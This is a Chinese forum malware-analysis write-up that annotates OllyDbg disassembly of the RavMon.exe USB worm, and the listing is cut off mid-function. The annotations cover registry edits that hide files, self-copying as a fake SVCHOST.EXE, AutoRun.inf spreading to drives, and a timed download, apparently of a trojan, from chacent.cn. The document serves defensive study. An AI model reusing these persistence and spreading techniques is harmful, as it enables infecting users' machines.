【文章作者】: newjueqi
【作者邮箱】: zengjiansheng1@126.com
【作者QQ号】: 190678908
【使用工具】: OD
【加壳方式】: 未知壳
【操作平台】: XP-SP2
【作者声明】: 本文是站在petnt大侠肩膀上的成果^-^。petnt大侠发表了“简单病毒RavMon.exe的分析”( http://bbs.pediy.com/showthread.php?t=76310),文中没有给出详细的代码分析,本人尝试分析这个病毒,把结果写成文章,当作是petnt大侠文章的补充。失误之处敬请诸位大侠赐教!
用peid查看了RavMon.exe文件,显示结果为:Nothing found [Overlay] * ,没关系,这个病毒可以带壳调试,本人也懒得脱壳 ^-^
用OD打开RavMon.exe文件,显示如下:
004141B0 > 833D 484E4100 0>cmp dword ptr [414E48], 0 ;入口地址
004141B7 75 05 jnz short 004141BE
004141B9 E9 01000000 jmp 004141BF
004141BE C3 retn
004141BF E8 46000000 call 0041420A
004141C4 E8 73000000 call 0041423C
004141C9 B8 B0414100 mov eax, offset <模块入口点>
004141CE 2B05 084E4100 sub eax, dword ptr [414E08]
004141D4 A3 444E4100 mov dword ptr [414E44], eax
004141D9 E8 9C000000 call 0041427A
004141DE E8 1A020000 call 004143FD
004141E3 E8 CA060000 call 004148B2
004141E8 E8 19060000 call 00414806
004141ED A1 444E4100 mov eax, dword ptr [414E44]
004141F2 C705 484E4100 0>mov dword ptr [414E48], 1
004141FC 0105 004E4100 add dword ptr [414E00], eax
00414202 FF35 004E4100 push dword ptr [414E00]
00414208 C3 retn ;这就是壳的出口
然后来到如下的代码:
004038BB 6A db 6A ; CHAR 'j'
004038BC . 60 pushad
004038BD ? 68 C0954000 push 004095C0
004038C2 ? E8 81030000 call 00403C48
004038C7 ? BF 94000000 mov edi, 94
004038CC ? 8BC7 mov eax, edi
004038CE ? E8 CD1E0000 call 004057A0
004038D3 89 db 89
004038D4 65 db 65 ; CHAR 'e'
004038D5 E8 db E8
看到的代码很奇怪,这时只要按Ctrl+A让OD重新分析代码,就可以正常显示汇编代码:
004038BB . 6A 60 push 60
004038BD . 68 C0954000 push 004095C0
004038C2 . E8 81030000 call 00403C48
004038C7 . BF 94000000 mov edi, 94
004038CC . 8BC7 mov eax, edi
004038CE . E8 CD1E0000 call 004057A0
…………
…………
来到这里:
00403A41 . E8 6ADBFFFF call 004015B0 ;这是关键call,跟进去
来到这里
004015B0 /$ 81EC 90020000 sub esp, 290
004015B6 |. A1 88B04000 mov eax, dword ptr [40B088>
004015BB |. 53 push ebx
004015BC |. 55 push ebp
004015BD |. 56 push esi
004015BE |. 57 push edi
004015BF |. 68 FF000000 push 0FF ; /BufSize = FF (255.)
004015C4 |. 68 58B84000 push 0040B858 ; |PathBuffer = RavMon.0040B858
004015C9 |. 33DB xor ebx, ebx ; |
004015CB |. 53 push ebx ; |hModule => NULL
004015CC |. 898424 A80200>mov dword ptr [esp+2A8], e>; |
004015D3 |. 33ED xor ebp, ebp ; |
004015D5 |. FF15 40904000 call dword ptr [409040] ; \GetModuleFileNameA;文件的完整路径存储
在0040B858
004015DB |. 68 04010000 push 104
004015E0 |. 68 58B84000 push 0040B858
004015E5 |. 68 60B94000 push 0040B960
004015EA |. E8 A11D0000 call 00403390 ;把文件完整路径存储在0040B960
004015EF |. 6A 5C push 5C
004015F1 |. 68 60B94000 push 0040B960
004015F6 |. E8 651D0000 call 00403360
004015FB |. 8BF0 mov esi, eax ; RavMon.0040B975
…………
…………
0040163A |. >add esp, 8
0040163D |> >call 00402370 ;通过修改注册表实现系统将不再显示隐藏文件和扩展名(从下面 00402370 的完整代码看,只改动了 SHOWALL\CheckedValue 和 Advanced\Hidden 两个值,未见涉及扩展名显示的注册表项)
00402370 /$ >sub esp, 8
00402373 |. >push ebx
00402374 |. >mov ebx, dword ptr [409004] ; ADVAPI32.RegCreateKeyExA
0040237A |. >push esi
0040237B |. >push edi
0040237C |. >push 0 ; /pDisposition = NULL
0040237E |. >lea eax, dword ptr [esp+10] ; |
00402382 |. >push eax ; |pHandle
00402383 |. >push 0 ; |pSecurity = NULL
00402385 |. >push 0F003F ; |Access = KEY_ALL_ACCESS
0040238A |. >push 0 ; |Options = REG_OPTION_NON_VOLATILE
0040238C |. >push 0 ; |Class = NULL
0040238E |. >push 0 ; |Reserved = 0
00402390 |. >push 004094D8 ; |Subkey =
"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
00402395 |. >push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
0040239A |. >call ebx ; \RegCreateKeyExA
0040239C |. >test eax, eax
0040239E |. >mov esi, dword ptr [40900C] ; ADVAPI32.RegSetValueExA
004023A4 |. >mov edi, dword ptr [409010] ; ADVAPI32.RegCloseKey
004023AA |. >jnz short 004023DA
004023AC |. >mov ecx, dword ptr [esp+C]
004023B0 |. >push 004094C8 ; /ValueName = "CheckedValue"
004023B5 |. >push ecx ; |hKey=6C
004023B6 |. >call dword ptr [409000] ; \RegDeleteValueA,删除
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL中的
CheckedValue
004023BC |. >mov edx, dword ptr [esp+C]
004023C0 |. >push 4 ; /BufSize = 4
004023C2 |. >push 004094C4 ; |Buffer = RavMon.004094C4
004023C7 |. >push 1 ; |ValueType = REG_SZ
004023C9 |. >push 0 ; |Reserved = 0
004023CB |. >push 004094C8 ; |ValueName = "CheckedValue"
004023D0 |. >push edx ; |hKey
004023D1 |. >call esi ; \RegSetValueExA,新建一个CheckedValue,值为0(注意上面压入的 ValueType 为 1 即 REG_SZ,而不是通常的 REG_DWORD,恢复时要连类型一起改回)
004023D3 |. >mov eax, dword ptr [esp+C]
004023D7 |. >push eax ; /hKey
004023D8 |. >call edi ; \RegCloseKey
004023DA |> >push 0
004023DC |. >lea ecx, dword ptr [esp+10]
004023E0 |. >push ecx
004023E1 |. >push 0
004023E3 |. >push 20006
004023E8 |. >push 0
004023EA |. >push 0
004023EC |. >push 0
004023EE |. >push 00409488 ; ASCII
"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
004023F3 |. >push 80000001
004023F8 |. >call ebx ; \RegCreateKeyExA
004023FA |. >test eax, eax
004023FC |. >jnz short 00402423
004023FE |. >push 4
00402400 |. >lea edx, dword ptr [esp+14]
00402404 |. >push edx
00402405 |. >push 4
00402407 |. >push eax
00402408 |. >mov eax, dword ptr [esp+1C]
0040240C |. >push 00409480 ; ASCII "Hidden"
00402411 |. >push eax
00402412 |. >mov dword ptr [esp+28], 2
0040241A |. >call esi ; \RegSetValueExA
0040241C |. >mov ecx, dword ptr [esp+C]
00402420 |. >push ecx
00402421 |. >call edi ; ADVAPI32.RegCloseKey
00402423 |> >pop edi
00402424 |. >pop esi
00402425 |. >pop ebx
00402426 |. >add esp, 8
00402429 \. >retn
0040164D |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401652 |. 68 30B74000 push 0040B730 ; |Buffer = RavMon.0040B730
00401657 |. FF15 38904000 call dword ptr [409038] ; \GetWindowsDirectoryA
0040165D |. 33C0 xor eax, eax
0040165F |. 90 nop
00401660 |> 8A88 30B74000 /mov cl, byte ptr [eax+40B730] ;这段循环把Windows的目录路径复制
到12fc80
00401666 |. 888C04 940000>|mov byte ptr [esp+eax+94], cl
0040166D |. 40 |inc eax
0040166E |. 3ACB |cmp cl, bl
00401670 |.^ 75 EE \jnz short 00401660
00401672 |. 8DBC24 940000>lea edi, dword ptr [esp+94] ;把堆栈里Windows的目录路径复制到edi
00401679 |. 4F dec edi
0040167A |. 8D9B 00000000 lea ebx, dword ptr [ebx]
………
………
004016AF |. >mov byte ptr [edi+C], cl
004016B2 >call 00401B90 ; 检查系统路径是否合法
004016B7 |. >push 0040B858 ;
004016BC |. >call 00401B90 ; 检查文件运行的路径是否合法
004016C1 |. >add esp, 8
004016C4 |. >mov esi, 0040B858
004016C9 |. >lea eax, dword ptr [esp+94]
;004016D0-004016EE 比较当前文件路径是否为系统路径
004016D0 |> >/mov dl, byte ptr [eax]
004016D2 |. >|mov cl, dl
004016D4 |. >|cmp dl, byte ptr [esi]
004016D6 |. >|jnz short 004016F4
004016D8 |. >|cmp cl, bl
004016DA |. >|je short 004016F0
004016DC |. >|mov dl, byte ptr [eax+1]
004016DF |. >|mov cl, dl
004016E1 |. >|cmp dl, byte ptr [esi+1]
004016E4 |. >|jnz short 004016F4
004016E6 |. >|add eax, 2
004016E9 |. >|add esi, 2
004016EC |. >|cmp cl, bl
004016EE |.^ >\jnz short 004016D0
004016F0 |> >xor eax, eax
004016F2 |. >jmp short 004016F9
004016F4 |> >sbb eax, eax
004016F6 |. >sbb eax, -1
004016F9 |> >cmp eax, ebx
………
………
;当前文件不是系统目录下的运行文件
004016FB |. >push 00409280 ; /IniFileName = "SVCHOST.INI"
00401700 |. >je 0040183C ; |
00401706 |. >mov ebp, dword ptr [409034] ; |kernel32.GetPrivateProfileStringA
0040170C |. >push 14 ; |BufSize = 14 (20.)
0040170E |. >lea eax, dword ptr [esp+78] ; |
00401712 |. >push eax ; |ReturnBuffer
00401713 |. >push 0040927C ; |Default = "100"
00401718 |. >push 00409274 ; |Key = "version"
0040171D |. >push 0040926C ; |Section = "INFO"
00401722 |. >call ebp ; \GetPrivateProfileStringA,在SVCHOST.INI中获取病
毒的版本号
00401724 |. >mov edi, 00409268 ; ASCII "104"
00401729 |. >lea esi, dword ptr [esp+70]
0040172D |. >mov ecx, 4
00401732 |. >xor eax, eax
00401734 |. >repe cmps byte ptr es:[edi], by> ;把当前版本号和在SVCHOST.INI中获取的版
本号进行比较
00401736 |. >je short 0040173D
00401738 |. >sbb eax, eax
0040173A |. >sbb eax, -1
0040173D |> >cmp eax, ebx
0040173F |. >push 00409280 ; ASCII "SVCHOST.INI"
00401744 |. >push 14
00401746 |. >jl short 00401779
00401748 |. >lea ecx, dword ptr [esp+78]
0040174C |. >push ecx
0040174D |. >push 00409260 ; ASCII "default"
00401752 |. >push 0040925C ; ASCII "win"
00401757 |. >push 0040926C ; ASCII "INFO"
0040175C |. >call ebp ; kernel32.GetPrivateProfileStringA
0040175E |. >lea edx, dword ptr [esp+70]
00401762 |. >push edx ; Title = "VNJFVAKFSDBTMKLN"
00401763 |. >push 00409254 ; |Class = "SVCHOST"
00401768 |. >call dword ptr [40917C] ; \FindWindowA
0040176E |. >test eax, eax ;检查窗口是否存在
00401770 |. >je short 004017B9 ;不存在就跳走
00401772 |> >xor eax, eax
00401774 |. >jmp 00401A21 ;跳到强行结束进程的函数调用
00401779 |> >lea eax, dword ptr [esp+78] ;如果检测到版本号不低就跳到这里
0040177D |. >push eax
0040177E |. >push 00409260 ; ASCII "default"
00401783 |. >push 0040925C ; ASCII "win"
00401788 |. >push 0040926C ; ASCII "INFO"
0040178D |. >call ebp
0040178F |. >lea ecx, dword ptr [esp+70]
00401793 |. >push ecx ; /Title
00401794 |. >push 00409254 ; |Class = "SVCHOST"
00401799 |. >call dword ptr [40917C] ; \FindWindowA
0040179F |. >cmp eax, ebx ;发现窗口存在就退出
004017A1 |. >je short 004017B9
004017A3 |. >push ebx ; /lParam
004017A4 |. >push ebx ; |wParam
004017A5 |. >push 12 ; |Message = WM_QUIT
004017A7 |. >push eax ; |hWnd
004017A8 |. >call dword ptr [409178] ; \PostMessageA
004017AE |. >push 3E8 ; /Timeout = 1000. ms
004017B3 |. >call dword ptr [409030] ; \Sleep
004017B9 |> >mov esi, dword ptr [40902C] ; kernel32.SetFileAttributesA
004017BF |. >push 80 ; /FileAttributes = NORMAL
004017C4 |. >lea edx, dword ptr [esp+98] ; |
004017CB |. >push edx ; |FileName = "C:\WINDOWS\SVCHOST.EXE"
004017CC |. >call esi ; \SetFileAttributesA,先把系统目录里 SVCHOST.EXE 的属性设为 NORMAL,
随后(下面的 CopyFileA)再把病毒文件复制到系统目录
004017CE |. >push ebx ; /FailIfExists
004017CF |. >lea eax, dword ptr [esp+98] ; |
004017D6 |. >push eax ; |NewFileName
004017D7 |. >push 0040B858 ; |ExistingFileName = "D:\我的文档\",D7,"烂
",B8,"",BD,"件\RAVMON.EXE"
004017DC |. >call dword ptr [409028] ; \CopyFileA,把病毒文件复制到系统目录
004017E2 |. >push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
004017E4 |. >lea ecx, dword ptr [esp+98] ; |
004017EB |. >push ecx ; |FileName = "C:\WINDOWS\SVCHOST.EXE"
004017EC |. >call esi ; \SetFileAttributesA,设置SVCHOST.EXE属性为只读
,隐藏,系统
004017EE |. >xor eax, eax
004017F0 |. >mov ecx, 11
004017F5 |. >lea edi, dword ptr [esp+10]
004017F9 |. >rep stos dword ptr es:[edi]
004017FB |. >lea edx, dword ptr [esp+84]
00401802 |. >push edx ; /pProcessInfo
00401803 |. >lea eax, dword ptr [esp+14] ; |
00401807 |. >push eax ; |pStartupInfo
00401808 |. >push ebx ; |CurrentDir
00401809 |. >push ebx ; |pEnvironment
0040180A |. >push ebx ; |CreationFlags
0040180B |. >push ebx ; |InheritHandles
0040180C |. >push ebx ; |pThreadSecurity
0040180D |. >push ebx ; |pProcessSecurity
0040180E |. >push ebx ; |CommandLine
0040180F |. >lea ecx, dword ptr [esp+B8] ; |
00401816 |. >push ecx ; |ModuleFileName = "C:\WINDOWS\SVCHOST.EXE"
00401817 |. >call dword ptr [4090C0] ; \CreateProcessA,通过创建新进程(而不是线程)来运行病毒
文件
0040181D |. >mov edx, dword ptr [esp+88]
00401824 |. >mov esi, dword ptr [4090B8] ; kernel32.CloseHandle
0040182A |. >push edx ; /hObject
0040182B |. >call esi ; \CloseHandle
0040182D |. >mov eax, dword ptr [esp+84]
00401834 |. >push eax ; /hObject
00401835 |. >call esi ; \CloseHandle
00401837 |. >jmp 00401A1C ;退出
;当前路径是系统路径时的执行过程
0040183C |> \>push 11 ; |BufSize = 11 (17.)
0040183E |. >lea ecx, dword ptr [esp+78] ; |
00401842 |. >push ecx ; |ReturnBuffer
00401843 |. >push 00409260 ; |Default = "default"
00401848 |. >push 0040925C ; |Key = "win"
0040184D |. >push 0040926C ; |Section = "INFO"
00401852 |. >call dword ptr [409034] ; \GetPrivateProfileStringA
00401858 |. >lea edx, dword ptr [esp+70]
0040185C |. >push edx ; /Title = "HIMQWRQWOJDTJDRW"
0040185D |. >push 00409254 ; |Class = "SVCHOST"
00401862 |. >call dword ptr [40917C] ; \FindWindowA
00401868 |. >test eax, eax
0040186A |.^ >jnz 00401772 ;如果窗口存在就退出
………
………
004018A8 |.>push 7F00 ; /RsrcName = IDI_APPLICATION
004018AD |.>push ebx ; |hInst
004018AE |.>mov dword ptr [esp+8C], edx ; |
004018B5 |.>mov dword ptr [esp+90], eax ; |
004018BC |.>mov dword ptr [esp+18], ebx ; |
004018C0 |.>mov dword ptr [esp+1C], 00401000 ; | 窗口过程地址
004018C8 |.>mov dword ptr [esp+20], ebx ; |
004018CC |.>mov dword ptr [esp+24], ebx ; |
004018D0 |.>mov dword ptr [esp+28], esi ; |
004018D4 |.>call dword ptr [409174] ; \LoadIconA
004018DA |.>push 7F00 ; /RsrcName = IDC_ARROW
004018DF |.>push ebx ; |hInst
004018E0 |.>mov dword ptr [esp+2C], eax ; |
004018E4 |.>call dword ptr [409170] ; \LoadCursorA
004018EA |.>push ebx ; /ObjType
004018EB |.>mov dword ptr [esp+2C], eax ; |
004018EF |.>call dword ptr [40901C] ; \GetStockObject
004018F5 |.>lea edx, dword ptr [esp+10]
004018F9 |.>lea ecx, dword ptr [esp+84]
00401900 |.>push edx ; /pWndClass
00401901 |.>mov dword ptr [esp+30], eax ; |
00401905 |.>mov dword ptr [esp+34], ebx ; |
00401909 |.>mov dword ptr [esp+38], ecx ; |
0040190D |.>call dword ptr [40916C] ; \RegisterClassA
………
………
;在SVCHOST.INI里写入病毒版本信息
00401952 |. >push 00409280 ; /FileName = "SVCHOST.INI"
00401957 |. >push 00409268 ; |String = "104"
0040195C |. >push 00409274 ; |Key = "version"
00401961 |. >push 0040926C ; |Section = "INFO"
00401966 |. >call esi ; \WritePrivateProfileStringA
00401968 |. >push 00409280 ; /FileName = "SVCHOST.INI"
0040196D |. >lea edx, dword ptr [esp+74] ; |
00401971 |. >push edx ; |String = "BTPDELA"
00401972 |. >push 0040925C ; |Key = "win"
00401977 |. >push 0040926C ; |Section = "INFO"
0040197C |. >call esi ; \WritePrivateProfileStringA
………
………
004019C3 |. >push 6 ; /FileAttributes = HIDDEN|SYSTEM
004019C5 |. >lea ecx, dword ptr [esp+19C] ; |
004019CC |. >mov dword ptr [edi+8], edx ; |
004019CF |. >push ecx ; |FileName
004019D0 |. >mov byte ptr [edi+C], al ; |
004019D3 |. >call dword ptr [40902C] ; \SetFileAttributesA ;设置文件属性
004019D9 |. >mov esi, dword ptr [40915C] ; USER32.GetMessageA
004019DF |. >push ebx ; /MsgFilterMax
004019E0 |. >push ebx ; |MsgFilterMin
004019E1 |. >push ebx ; |hWnd
004019E2 |. >lea edx, dword ptr [esp+60] ; |
004019E6 |. >push edx ; |pMsg
004019E7 |. >call esi ; \GetMessageA
004019E9 |. >test eax, eax
004019EB |. >je short 00401A1C
004019ED |. >mov edi, dword ptr [409158] ; USER32.TranslateMessage ;
004019F3 |. >mov ebp, dword ptr [409154] ; USER32.DispatchMessageA
;进入消息循环
;下面是消息处理部分
;文件创建时的消息处理
00401042 >>xor eax, eax ; Case 1 (WM_CREATE) of switch 0040101B
00401044 .>mov dword ptr [40B720], eax
00401049 .>mov dword ptr [40B724], eax
0040104E .>mov dword ptr [40B728], eax
00401053 .>push 0040B720
00401058 .>mov byte ptr [40B72C], al
0040105D .>call 00401C00
00401062 .>push 0040B834 ; ASCII
"385323ccdc790b3302b32120ef1dbe9a"
00401067 .>push 0040B858
0040106C .>call 004030D0 ;文件的校验
00401071 .>mov esi, dword ptr [esp+510]
00401078 .>mov edi, dword ptr [409198] ; USER32.SetTimer
0040107E .>add esp, 0C
00401081 .>push 0 ; /Timerproc = NULL
00401083 .>push 7530 ; |Timeout = 30000. ms
00401088 .>push 1 ; |TimerID = 1
0040108A .>push esi ; |hWnd
0040108B .>call edi ; \SetTimer,定时器1,感染各个盘
0040108D .>push 0 ; /Timerproc = NULL
0040108F .>push 493E0 ; |Timeout = 300000. ms
00401094 .>push 2 ; |TimerID = 2
00401096 .>push esi ; |hWnd
00401097 .>call edi ; \SetTimer ;定时器2,在网上下载文件
00401099 .>call 00402370 ;通过修改注册表实现系统将不再显示隐藏文件和扩展名
WM_TIMER的消息
0040109E >>mov eax, dword ptr [esp+50C] ; Case 113 (WM_TIMER) of switch 0040101B
我们先看定时器2的处理
004010B3 .>mov ecx, dword ptr [409234] ; Case 2 of switch 004010A5
………….
………….
00401118 .>push eax ; /Buffer
00401119 .>and ecx, 3 ; |
0040111C .>push 104 ; |BufSize = 104 (260.)
00401121 .>rep movs byte ptr es:[edi], byte>; |
00401123 .>call dword ptr [409068] ; \GetTempPathA
00401129 .>lea ecx, dword ptr [esp+3F8]
00401130 .>push ecx ; /TempName
00401131 .>push 0 ; |Unique = 0
00401133 .>push 0 ; |Prefix = NULL
00401135 .>mov edx, ecx ; |
00401137 .>push edx ; |Path
00401138 .>call dword ptr [4090B4] ; \GetTempFileNameA
0040113E .>lea eax, dword ptr [esp+3F8]
00401145 .>push eax
00401146 .>lea ecx, dword ptr [esp+24]
0040114A .>push ecx
0040114B .>push 00409228 ; ASCII "chacent.cn"
00401150 .>call 00402010 ;在“chacent.cn”上下载一个文件,应该是木马
下面的部分就是执行木马程序,内容太多,不贴出来
现在来看定时器1的消息处理
00401380 >>lea ebx, dword ptr [esp+28C] ; Case 1 of switch 004010A5
00401387 .>mov ecx, ebx
00401389 .>push ecx ; /Buffer
0040138A .>push 68 ; |BufSize = 68 (104.)
0040138C .>call dword ptr [4090C8] ; \GetLogicalDriveStringsA
00401380 >>lea ebx, dword ptr [esp+28C] ; Case 1 of switch 004010A5
00401387 .>mov ecx, ebx
00401389 .>push ecx ; /Buffer
0040138A .>push 68 ; |BufSize = 68 (104.)
0040138C .>call dword ptr [4090C8] ; \GetLogicalDriveStringsA
00401392 .>mov edi, 00409211
00401397 .>mov esi, ebx
00401399 .>mov ecx, 1
0040139E .>xor edx, edx
004013A0 .>repe cmps byte ptr es:[edi], by>
004013A2 .>je short 00401406
004013A4 .>mov ebp, dword ptr [4090D0] ; kernel32.GetDriveTypeA
004013AA .>lea ebx, dword ptr [ebx]
004013B0 >>push ebx
004013B1 .>call ebp
004013B3 .>cmp eax, 2
004013B6 .>je short 004013BD
004013B8 .>cmp eax, 3
004013BB .>jnz short 004013E2
004013BD >>push 0040B834 ; ASCII "385323ccdc790b3302b32120ef1dbe9a"
004013C2 .>push 0040B040 ; ASCII "b69e4b47aa79ec1edeb98f5275ded52d"
004013C7 .>push ebx
004013C8 .>call 00401E80
004013CD .>add esp, 0C
004013D0 .>test eax, eax
004013D2 .>jnz short 004013E2
004013D4 .>push 0040B858
004013D9 .>push ebx
004013DA .>call 00401CE0 ;把病毒文件复制到U盘,并生成AutoRun.inf文件使U盘的
病毒自动运行,具体代码如下:
00401CE0 /$>sub esp, 20C
00401CE6 |.>mov eax, dword ptr [40B088]
00401CEB |.>push esi
00401CEC |.>mov dword ptr [esp+20C], eax
00401CF3 |.>mov eax, dword ptr [esp+214]
00401CFA |.>lea esi, dword ptr [esp+4]
00401CFE |.>push edi
00401CFF |.>mov ecx, eax
00401D01 |.>sub esi, eax
00401D03 |>>/mov dl, byte ptr [ecx]
00401D05 |.>|mov byte ptr [esi+ecx], dl
00401D08 |.>|inc ecx
00401D09 |.>|test dl, dl
00401D0B |.>\jnz short 00401D03
00401D0D |.>lea edx, dword ptr [esp+10C]
00401D14 |.>sub edx, eax
00401D16 |>>/mov cl, byte ptr [eax]
00401D18 |.>|mov byte ptr [edx+eax], cl
00401D1B |.>|inc eax
00401D1C |.>|test cl, cl
00401D1E |.>\jnz short 00401D16
00401D20 |.>lea edi, dword ptr [esp+8]
00401D24 |.>dec edi
00401D25 |>>/mov al, byte ptr [edi+1]
00401D28 |.>|inc edi
00401D29 |.>|test al, al
00401D2B |.>\jnz short 00401D25
00401D2D |.>mov eax, dword ptr [4093B8]
00401D32 |.>mov ecx, dword ptr [4093BC]
00401D38 |.>mov edx, dword ptr [4093C0]
00401D3E |.>mov dword ptr [edi], eax
00401D40 |.>mov dword ptr [edi+4], ecx
00401D43 |.>mov dword ptr [edi+8], edx
00401D46 |.>lea edi, dword ptr [esp+10C]
00401D4D |.>dec edi
00401D4E |.>mov edi, edi
00401D50 |>>/mov al, byte ptr [edi+1]
00401D53 |.>|inc edi
00401D54 |.>|test al, al
00401D56 |.>\jnz short 00401D50
00401D58 |.>mov eax, dword ptr [4093AC]
00401D5D |.>mov ecx, dword ptr [4093B0]
00401D63 |.>mov dx, word ptr [4093B4]
00401D6A |.>mov dword ptr [edi], eax
00401D6C |.>mov al, byte ptr [4093B6]
00401D71 |.>mov dword ptr [edi+4], ecx
00401D74 |.>mov word ptr [edi+8], dx
00401D78 |.>push 80 ; /FileAttributes = NORMAL
00401D7D |.>lea ecx, dword ptr [esp+C] ; |
00401D81 |.>mov byte ptr [edi+A], al ; |
00401D84 |.>mov edi, dword ptr [40902C] ; |kernel32.SetFileAttributesA
00401D8A |.>push ecx ; |FileName
00401D8B |.>call edi ; \SetFileAttributesA
00401D8D |.>push 0 ; /hTemplateFile = NULL
00401D8F |.>push 6 ; |Attributes = HIDDEN|SYSTEM
00401D91 |.>push 2 ; |Mode = CREATE_ALWAYS
00401D93 |.>push 0 ; |pSecurity = NULL
00401D95 |.>push 0 ; |ShareMode = 0
00401D97 |.>push 40000000 ; |Access = GENERIC_WRITE
00401D9C |.>lea edx, dword ptr [esp+20] ; |
00401DA0 |.>push edx ; |FileName
00401DA1 |.>call dword ptr [4090B0] ; \CreateFileA
00401DA7 |.>cmp eax, -1
00401DAA |.>je 00401E67
00401DB0 |.>push eax ; /hObject
00401DB1 |.>call dword ptr [4090B8] ; \CloseHandle
00401DB7 |.>mov esi, dword ptr [409024] ; kernel32.WritePrivateProfileStringA
00401DBD |.>lea eax, dword ptr [esp+8]
00401DC1 |.>push eax ; /FileName
00401DC2 |.>push 004093AC ; |String = "RavMon.exe"
00401DC7 |.>push 00409200 ; |Key = "open"
00401DCC |.>push 004093A4 ; |Section = "AutoRun"
00401DD1 |.>call esi ; \WritePrivateProfileStringA
00401DD3 |.>lea ecx, dword ptr [esp+8]
00401DD7 |.>push ecx ; /FileName
00401DD8 |.>push 00409398
00401DDD |.>push 0040938C ; |Key = "shell\open"
00401DE2 |.>push 004093A4 ; |Section = "AutoRun"
00401DE7 |.>call esi ; \WritePrivateProfileStringA
00401DE9 |.>lea edx, dword ptr [esp+8]
00401DED |.>push edx ; /FileName
00401DEE |.>push 004093AC ; |String = "RavMon.exe"
00401DF3 |.>push 00409378 ; |Key = "shell\open\Command"
00401DF8 |.>push 004093A4 ; |Section = "AutoRun"
00401DFD |.>call esi ; \WritePrivateProfileStringA
00401DFF |.>lea eax, dword ptr [esp+8]
00401E03 |.>push eax ; /FileName
00401E04 |.>push 00409368
00401E09 |.>push 00409358 ; |Key = "shell\explore"
00401E0E |.>push 004093A4 ; |Section = "AutoRun"
00401E13 |.>call esi ; \WritePrivateProfileStringA
00401E15 |.>lea ecx, dword ptr [esp+8]
00401E19 |.>push ecx ; /FileName
00401E1A |.>push 00409348 ; |String = """RavMon.exe -e"""
00401E1F |.>push 00409330 ; |Key = "shell\explore\Command"
00401E24 |.>push 004093A4 ; |Section = "AutoRun"
00401E29 |.>call esi ; \WritePrivateProfileStringA
00401E2B |.>push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00401E2D |.>lea edx, dword ptr [esp+C] ; |
00401E31 |.>push edx ; |FileName
00401E32 |.>call edi ; \SetFileAttributesA
00401E34 |.>push 80 ; /FileAttributes = NORMAL
00401E39 |.>lea eax, dword ptr [esp+110] ; |
00401E40 |.>push eax ; |FileName
00401E41 |.>call edi ; \SetFileAttributesA
00401E43 |.>mov edx, dword ptr [esp+21C]
00401E4A |.>push 0 ; /FailIfExists = FALSE
00401E4C |.>lea ecx, dword ptr [esp+110] ; |
00401E53 |.>push ecx ; |NewFileName
00401E54 |.>push edx ; |ExistingFileName
00401E55 |.>call dword ptr [409028] ; \CopyFileA
00401E5B |.>push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00401E5D |.>lea eax, dword ptr [esp+110] ; |
00401E64 |.>push eax ; |FileName
00401E65 |.>call edi ; \SetFileAttributesA
00401E67 |>>mov ecx, dword ptr [esp+210]
00401E6E |.>pop edi
00401E6F |.>pop esi
00401E70 |.>call 00403279
00401E75 |.>add esp, 20C
00401E7B \.>retn
004013DF .>add esp, 8
004013E2 >>mov eax, ebx
004013E4 .>lea edx, dword ptr [eax+1]
004013E7 >>mov cl, byte ptr [eax]
004013E9 .>inc eax
004013EA .>test cl, cl
004013EC .>jnz short 004013E7
004013EE .>sub eax, edx
004013F0 .>lea ebx, dword ptr [ebx+eax+1]
004013F4 .>mov edi, 00409211
004013F9 .>mov esi, ebx
004013FB .>mov ecx, 1
00401400 .>xor eax, eax
00401402 .>repe cmps byte ptr es:[edi], by>
00401404 .>jnz short 004013B0
00401406 >>call 00402370 ;通过修改注册表实现系统将不再显示隐藏文件和扩展名
0040140B .>xor eax, eax
0040140D .>lea ecx, dword ptr [ecx]
00401410 >>mov cl, byte ptr [eax+40B730]
00401416 .>mov byte ptr [esp+eax+2F4], cl
0040141D .>inc eax
0040141E .>test cl, cl
00401420 .>jnz short 00401410
00401422 .>lea edi, dword ptr [esp+2F4]
00401429 .>dec edi
0040142A .>lea ebx, dword ptr [ebx]
00401430 >>mov al, byte ptr [edi+1]
00401433 .>inc edi
00401434 .>test al, al
00401436 .>jnz short 00401430
00401438 .>mov ecx, dword ptr [409208]
0040143E .>mov edx, dword ptr [40920C]
00401444 .>mov al, byte ptr [409210]
00401449 .>mov dword ptr [edi], ecx
0040144B .>mov dword ptr [edi+4], edx
0040144E .>lea ecx, dword ptr [esp+7C]
00401452 .>push ecx
00401453 .>lea edx, dword ptr [esp+2F8]
0040145A .>push edx
0040145B .>mov byte ptr [edi+8], al
0040145E .>call 004030D0 ;把病毒文件复制到本地硬盘(注:同一函数在 0040106C 处被注释为“文件的校验”,这里返回后又把 esp+7C 处的缓冲区与 0040B064 处的字符串逐字节比较,更像是对该文件计算校验值,读者请自行核实)
00401463 .>add esp, 8
00401466 .>test eax, eax
00401468 .>je short 004014A4
0040146A .>mov esi, 0040B064
0040146F .>lea eax, dword ptr [esp+7C]
00401473 >>mov dl, byte ptr [eax]
00401475 .>mov bl, byte ptr [esi]
00401477 .>mov cl, dl
00401479 .>cmp dl, bl
0040147B .>jnz short 0040149B
0040147D .>test cl, cl
0040147F .>je short 00401497
00401481 .>mov dl, byte ptr [eax+1]
00401484 .>mov bl, byte ptr [esi+1]
00401487 .>mov cl, dl
00401489 .>cmp dl, bl
0040148B .>jnz short 0040149B
0040148D .>add eax, 2
00401490 .>add esi, 2
00401493 .>test cl, cl
00401495 .>jnz short 00401473
00401497 >>xor eax, eax
00401499 .>jmp short 004014A0
0040149B >>sbb eax, eax
0040149D .>sbb eax, -1
004014A0 >>test eax, eax
004014A2 .>je short 004014B4
004014A4 >>lea eax, dword ptr [esp+2F4]
004014AB .>push eax
004014AC .>call 00402430
004014B1 .>add esp, 4
004014B4 >>lea ecx, dword ptr [esp+2F4]
004014BB .>push ecx
004014BC .>call 004024B0
004014C1 .>add esp, 4
004014C4 .>test eax, eax
004014C6 .>jnz 00401590
004014CC .>push 5 ; /IsShown = 5
004014CE .>push eax ; |DefDir
004014CF .>push eax ; |Parameters
